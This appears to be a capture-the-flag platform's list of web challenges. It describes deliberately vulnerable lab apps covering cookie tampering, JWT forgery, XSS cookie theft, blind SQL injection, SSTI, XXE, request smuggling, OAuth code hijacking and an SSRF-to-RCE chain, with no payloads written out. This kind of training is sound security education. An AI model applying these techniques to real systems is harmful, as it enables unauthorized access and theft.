Challenges

Clear
All 138 Web 14 Pwn 11 Crypto 11 Forensics 11 Rev 10 Misc 11 OSINT 10 network 11 Mobile 14 Cloud 14 web3 12 Linux 9
Web Easy

Cookie Manipulation

A simple web application that uses cookies to determine user role. The cookie is not encrypted or signed - can you modify it to gain admin access? Learning Objectives: - Understanding HTTP cookies - Browser developer tools - Cookie manipulation techniques - Importance of cookie security Skills Required: - Basic web browsing - Browser DevTools Skills Learned: - Cookie inspection and modification - Session management basics - Client-side security failures

50 pts
16 solves 🩸
Web Easy

Cookie Monster

A login portal that grants guest access. Admin privileges reveal the flag. Analyze HTTP cookies.

100 pts
7 solves 🩸
Web Easy

JWT Algorithm Confusion

A simple web API that uses JWT tokens for authentication. The developer trusted the algorithm field in the JWT header. Can you forge an admin token?

100 pts
13 solves 🩸
Web Easy

Robots.txt Disclosure

find an information discloser bug

50 pts
11 solves 🩸
Web Easy

Stored XSS Comment Board

Inject JavaScript to steal admin cookie

150 pts
12 solves 🩸
Web Medium

Blind SQL Injection

A login form vulnerable to SQL injection. However, error messages are suppressed. You'll need to use time-based blind SQLi to extract the admin password. The database contains a 'secrets' table with a 'flag' column.

250 pts
10 solves 🩸
Web Medium

GraphQL Introspection Leak

A GraphQL API endpoint has introspection enabled in production. The schema exposes a hidden adminUser query that returns a flag field — but only when called with a specific internal header the developer forgot to document. Discover the field via introspection, then figure out the header.

300 pts
2 solves 🩸
Web Medium

SQLi Shop

An e-commerce search feature vulnerable to SQL injection. A secrets table hides the flag.

250 pts
5 solves 🩸
Web Medium

SSTI Greet

A Flask greeting app that renders user input as a Jinja2 template. Exploit Server-Side Template Injection.

300 pts
6 solves 🩸
Web Medium

XXE via SVG Upload

A profile picture upload endpoint accepts SVG files and renders them server-side to PNG using librsvg. SVGs are XML — inject an XXE payload to read /etc/flag from the server's filesystem. The rendered PNG is returned directly in the response.

350 pts
2 solves 🩸
Web Hard

HTTP Request Smuggling

A reverse proxy (HAProxy) and a backend (Gunicorn) disagree on how to parse Transfer-Encoding vs Content-Length headers. Smuggle a request to poison the backend queue and steal the admin session cookie from their next request. The challenge server processes admin requests every 15 seconds.

450 pts
1 solve 🩸
Web Hard

JWT Auth

A JWT authentication portal. The server accepts the 'none' algorithm, allowing unsigned token forgery.

400 pts
6 solves 🩸
Web Hard

OAuth Token Hijack

A web app implements OAuth 2.0 with an open redirect in the redirect_uri validation — it only checks that the URI starts with the registered domain. The authorization server reflects the code in the URL. Steal the authorization code via the open redirect and exchange it for an admin token.

400 pts
1 solve 🩸
Web Insane

SSRF + RCE Chain

A URL fetcher with an internal metadata service. Chain SSRF to reach the internal service, then use a custom header to achieve RCE and read the flag file.

500 pts
5 solves 🩸